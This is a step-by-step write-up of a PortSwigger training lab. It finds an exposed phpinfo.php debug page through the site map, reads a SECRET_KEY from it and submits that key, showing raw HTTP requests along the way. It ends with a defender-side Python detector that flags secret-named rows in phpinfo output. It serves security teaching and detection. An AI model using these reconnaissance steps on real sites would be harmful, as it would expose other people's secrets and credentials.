PortSwigger: Information disclosure on debug page
Solution
Open website: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/product?productId=1
GET /product?productId=1 HTTP/2
Host: 0a920081036d4379b0ab08a400df003d.web-security-academy.net
Cookie: session=I0k77IVanUSS8dvQRJL370ZXhpsLzdZW
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Open website: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/product?productId=b
GET /product?productId=b HTTP/2
Host: 0a920081036d4379b0ab08a400df003d.web-security-academy.net
Cookie: session=I0k77IVanUSS8dvQRJL370ZXhpsLzdZW
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Check "Site map" for the website
Found file: phpinfo.php
https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/cgi-bin/phpinfo.php
Open website: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/cgi-bin/phpinfo.php
SECRET_KEY: itmmmwxpma7zawl4eb3t5xlay8lfqtx7
---
GET /cgi-bin/phpinfo.php HTTP/2
Host: 0a920081036d4379b0ab08a400df003d.web-security-academy.net
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="143", "Not=A?Brand";v="8", "Chromium";v="143"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Submit solution
SECRET_KEY: itmmmwxpma7zawl4eb3t5xlay8lfqtx7
---
POST /submitSolution HTTP/2
Host: 0a920081036d4379b0ab08a400df003d.web-security-academy.net
Cookie: session=I0k77IVanUSS8dvQRJL370ZXhpsLzdZW
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net
Referer: https://0a920081036d4379b0ab08a400df003d.web-security-academy.net/product?productId=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

answer=itmmmwxpma7zawl4eb3t5xlay8lfqtx7
Solved
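A defender-side check for the exposure walked through above, added here as an example that is not part of the original write-up: it recognises phpinfo() output in a response body and reports environment rows whose names look like secrets, with the values redacted. The sample HTML, the PHP version in it, and the name pattern are constructed assumptions; the row markup follows the table layout phpinfo() emits.

```python
import re
from html import unescape

# Names that suggest a secret; this list is an assumption, extend it for your stack.
SENSITIVE = re.compile(r"SECRET|PASSWORD|PASSWD|TOKEN|API_?KEY|PRIVATE", re.I)

# phpinfo() renders each setting as <tr><td class="e">name</td><td class="v">value</td>
ROW = re.compile(
    r'<tr>\s*<td class="e">(.*?)</td>\s*<td class="v">(.*?)</td>', re.I | re.S
)

def _text(cell: str) -> str:
    """Strip inline tags and entities from a table cell."""
    return unescape(re.sub(r"<[^>]+>", "", cell)).strip()

def is_phpinfo(body: str) -> bool:
    """True when the body has a phpinfo() title and phpinfo-style rows."""
    titled = re.search(r"<title>[^<]*phpinfo\(\)", body, re.I)
    return bool(titled) and bool(ROW.search(body))

def find_exposed_secrets(body: str) -> list[tuple[str, str]]:
    """Return (name, redacted value) for sensitive-looking phpinfo rows."""
    if not is_phpinfo(body):
        return []
    hits = []
    for raw_name, raw_value in ROW.findall(body):
        name, value = _text(raw_name), _text(raw_value)
        if SENSITIVE.search(name) and value and value != "no value":
            # Keep two characters for triage, mask the rest.
            hits.append((name, value[:2] + "*" * max(len(value) - 2, 0)))
    return hits

# Constructed sample response body, not captured from the lab.
SAMPLE = """<html><head><title>PHP 7.4.3 - phpinfo()</title></head><body>
<h2>Environment</h2>
<table>
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">PATH </td><td class="v">/usr/local/bin:/usr/bin </td></tr>
<tr><td class="e">SECRET_KEY </td><td class="v">constructed-example-value </td></tr>
<tr><td class="e">DB_PASSWORD </td><td class="v"><i>no value</i> </td></tr>
</table></body></html>"""

if __name__ == "__main__":
    for name, redacted in find_exposed_secrets(SAMPLE):
        print(f"exposed in phpinfo output: {name} = {redacted}")
```

Run against responses from your own staging or production hosts, a non-empty result means the debug page should be removed or access-restricted and the listed secrets rotated.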